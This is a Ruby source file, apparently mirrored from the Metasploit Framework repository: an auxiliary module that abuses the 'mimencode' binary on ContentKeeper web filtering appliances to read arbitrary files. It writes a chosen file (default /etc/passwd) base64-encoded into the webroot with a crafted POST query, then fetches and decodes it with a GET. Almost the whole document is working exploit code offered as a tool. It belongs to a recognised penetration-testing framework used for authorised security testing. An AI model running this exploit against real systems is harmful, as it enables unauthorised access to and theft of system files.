Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
rapid7
GitHub Repository: rapid7/metasploit-framework
 Path: blob/master/modules/auxiliary/admin/http/contentkeeper_fileaccess.rb
19639 views
1
##

2
# This module requires Metasploit: https://metasploit.com/download

3
# Current source: https://github.com/rapid7/metasploit-framework

4
##

5


6
class MetasploitModule < Msf::Auxiliary

7
  include Msf::Exploit::Remote::HttpClient

8
  include Msf::Auxiliary::Scanner

9


10
  def initialize

11
    super(

12
      'Name' => 'ContentKeeper Web Appliance mimencode File Access',

13
      'Description' => %q{

14
        This module abuses the 'mimencode' binary present within

15
        ContentKeeper Web filtering appliances to retrieve arbitrary

16
        files outside of the webroot.

17
        },

18
      'References' => [

19
        [ 'OSVDB', '54551' ],

20
        [ 'URL', 'http://www.aushack.com/200904-contentkeeper.txt' ],

21
      ],

22
      'Author' => [ 'aushack' ],

23
      'License' => MSF_LICENSE,

24
      'Notes' => {

25
        'Stability' => [CRASH_SAFE],

26
        'SideEffects' => [IOC_IN_LOGS],

27
        'Reliability' => []

28
      }

29
    )

30


31
    register_options(

32
      [

33
        OptString.new('FILE', [ true, 'The file to traverse for', '/etc/passwd']),

34
        OptString.new('URL', [ true, 'The path to mimencode', '/cgi-bin/ck/mimencode']),

35
      ]

36
    )

37
  end

38


39
  def run_host(_ip)

40
    tmpfile = Rex::Text.rand_text_alphanumeric(20) # Store the base64 encoded traversal data in a hard-to-brute filename, just in case.

41


42
    print_status("Attempting to connect to #{rhost}:#{rport}")

43
    res = send_request_raw(

44
      {

45
        'method' => 'POST',

46
        'uri' => normalize_uri(datastore['URL']) + '?-o+' + '/home/httpd/html/' + tmpfile + '+' + datastore['FILE']

47
      }, 25

48
    )

49


50
    if res && res.code == 500

51
      print_good("Request appears successful on #{rhost}:#{rport}! Response: #{res.code}")

52


53
      file = send_request_raw(

54
        {

55
          'method' => 'GET',

56
          'uri' => '/' + tmpfile

57
        }, 25

58
      )

59


60
      if file && (file.code == 200)

61
        print_status("Request for #{datastore['FILE']} appears to have worked on #{rhost}:#{rport}! Response: #{file.code}\r\n#{Rex::Text.decode_base64(file.body)}")

62
      elsif file && file.code

63
        print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \r\n#{res.body}")

64
      end

65
    elsif res && res.code

66
      print_error("Attempt returned HTTP error #{res.code} on #{rhost}:#{rport} Response: \r\n#{res.body}")

67
    end

68
  rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout => e

69
    vprint_error(e.message)

70
  rescue ::Timeout::Error, ::Errno::EPIPE => e

71
    vprint_error(e.message)

72
  end

73
end

74


75